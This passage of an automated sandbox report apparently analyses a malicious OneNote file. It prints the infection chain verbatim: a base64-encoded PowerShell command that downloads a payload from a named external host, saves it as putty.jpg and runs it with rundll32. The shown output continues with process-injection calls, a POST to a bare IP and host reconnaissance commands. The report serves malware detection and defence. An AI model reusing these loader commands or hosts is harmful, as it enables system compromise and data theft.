          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://incidents.diagnostics.office.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://inclient.store.office.com/gyro/client
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://invites.office.com/
          Source: FGR8SNK3.htm.14.drString found in binary or memory: https://jp.broadcom.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://lifecycle.office.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://login.microsoftonline.com/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://login.windows.local
          Source: App_1675799305235524000_F240886F-595A-4B76-A1BE-CF9D49A0F922.log.1.drString found in binary or memory: https://login.windows.net
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://make.powerautomate.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://management.azure.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://management.azure.com/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://messaging.action.office.com/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://messaging.engagement.office.com/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://messaging.lifecycle.office.com/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://messaging.office.com/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://my.microsoftpersonalcontent.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://ncus.contentsync.
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://ncus.pagecontentsync.
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://officeapps.live.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://officeci.azurewebsites.net/api/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://onedrive.live.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://onedrive.live.com/embed?
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://otelrules.azureedge.net
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://outlook.office.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://outlook.office.com/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://outlook.office365.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://outlook.office365.com/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://pages.store.office.com/review/query
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://powerlift.acompli.net
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://pushchannel.1drv.ms
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://res.cdn.office.net/polymer/models
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://settings.outlook.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://shell.suite.office.com:1443
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://skyapi.live.net/Activity/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://staging.cortana.ai
          Source: FGR8SNK3.htm.14.drString found in binary or memory: https://static.broadcom.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://store.office.cn/addinstemplate
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://store.office.de/addinstemplate
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://tasks.office.com
          Source: powershell.exe, 00000008.00000002.5649681111.000002AA51878000.00000004.00000800.00020000.00000000.sdmp, in.cmd.6.drString found in binary or memory: https://tassoinmobiliaria.com/56G0/01.gif
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://web.microsoftstream.com/video/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://webshell.suite.office.com
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://wus2.contentsync.
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://wus2.pagecontentsync.
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
          Source: FGR8SNK3.htm.14.drString found in binary or memory: https://www.broadcom.cn
          Source: FGR8SNK3.htm.14.drString found in binary or memory: https://www.broadcom.com
          Source: FGR8SNK3.htm.14.drString found in binary or memory: https://www.broadcom.com/media/blt4ac44e0e6c6d8341/blt476a993c2707b028/62e16f3bd3b8a5700456394e/wwwB
          Source: FGR8SNK3.htm.14.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
          Source: FGR8SNK3.htm.14.drString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-KF7XWD
          Source: 86EA0135-154D-489F-87C7-839AC3EE6B84.1.drString found in binary or memory: https://www.odwebp.svc.ms
          Source: unknownDNS traffic detected: queries for: tassoinmobiliaria.com
          Source: global trafficHTTP traffic detected: GET /56G0/01.gif HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: tassoinmobiliaria.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: broadcom.comCache-Control: no-cache
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
          Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownTCP traffic detected without corresponding DNS query: 87.149.176.97
          Source: unknownHTTP traffic detected: POST /t5 HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 87.149.176.97Content-Length: 80Cache-Control: no-cache
          Source: unknownHTTPS traffic detected: 148.163.69.171:443 -> 192.168.11.20:49827 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 50.112.202.115:443 -> 192.168.11.20:49836 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 87.149.176.97:443 -> 192.168.11.20:49838 version: TLS 1.2

          System Summary

          barindex
          Source: Process Memory Space: powershell.exe PID: 7684, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\putty.jpgJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_100194D013_2_100194D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1001799F13_2_1001799F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_100175E013_2_100175E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1001520713_2_10015207
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10003EEA13_2_10003EEA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_10013BFA13_2_10013BFA
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXESection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXESection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\SysWOW64\whoami.exeSection loaded: edgegdi.dll
          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
          Source: C:\Windows\System32\msiexec.exeSection loaded: edgegdi.dll
          Source: Joe Sandbox ViewDropped File: C:\ProgramData\putty.jpg F716C2324C1E7DEFED9B822F543156934C3534EEDC9EF1E69FC3745733C5DCB7
          Source: putty.jpg.11.drStatic PE information: Data appended to the last section found
          Source: Process Memory Space: powershell.exe PID: 7684, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1000A4A8 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,KiUserCallbackDispatcher,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,13_2_1000A4A8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1000AA02 KiUserCallbackDispatcher,Wow64GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,13_2_1000AA02
          Source: 6153a066.dll.13.drStatic PE information: Resource name: RT_MESSAGETABLE type: a.out little-endian 32-bit pure executable not stripped
          Source: 6153a066.dll.13.drStatic PE information: No import functions for PE file found
          Source: putty.jpg.11.drStatic PE information: No import functions for PE file found
          Source: Send to OneNote.lnk.1.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEFile created: C:\Users\user\Documents\{DE190637-2A90-46C1-910E-B0477FAA2340}Jump to behavior
          Source: 6153a066.dll.13.drBinary string: \Device\IPT[
          Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winONE@51/729@3/3
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEFile read: C:\Program Files\desktop.iniJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_100011EB CreateBitmapIndirect,CreateBrushIndirect,CreateDIBPatternBrush,CreateDIBPatternBrushPt,CreateDIBSection,CreateEllipticRgn,CreateEllipticRgnIndirect,CreateEnhMetaFileA,CreateFontA,CreateFontIndirectExW,CreateHalftonePalette,CreateHatchBrush,CreatePatternBrush,CreatePenIndirect,CreateRectRgnIndirect,CreateRoundRectRgn,CreateScalableFontResourceA,CreateScalableFontResourceW,CreateSolidBrush,GdiGetBatchLimit,GdiTransparentBlt,WICMapGuidToShortName,WICMapSchemaToName,WICMapShortNameToGuid,AccessCheckAndAuditAlarmA,AccessCheckByTypeAndAuditAlarmA,AddAccessAllowedAce,AddAccessAllowedAceEx,AddAccessDeniedAce,AddAuditAccessObjectAce,BuildTrusteeWithSidA,ChangeServiceConfig2A,CloseTrace,ConvertToAutoInheritPrivateObjectSecurity,CreatePrivateObjectSecurity,EnumerateTraceGuidsEx,EqualDomainSid,EventActivityIdControl,EventWrite,EventWriteEx,EventWriteString,EventWriteTransfer,FindFirstFreeAce,GetEventLogInformation,GetAce,13_2_100011EB
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Note.one
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess created: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE /tsr
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Open.cmd" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3Rhc3NvaW5tb2JpbGlhcmlhLmNvbS81NkcwLzAxLmdpZiAtT3V0RmlsZSBDOlxwcm9ncmFtZGF0YVxwdXR0eS5qcGcNCnJ1bmRsbDMyIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZyxXaW5kDQpleGl0DQo='))
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmd
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -URI https://tassoinmobiliaria.com/56G0/01.gif -OutFile C:\programdata\putty.jpg
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\putty.jpg,Wind
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\programdata\putty.jpg,Wind
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\backgroundTaskHost.exe C:\Windows\SysWOW64\backgroundTaskHost.exe
          Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE "C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE" /tsr
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\net.exe net view
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c set
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\ARP.EXE arp -a
          Source: C:\Windows\SysWOW64\ARP.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\net.exe net share
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 share
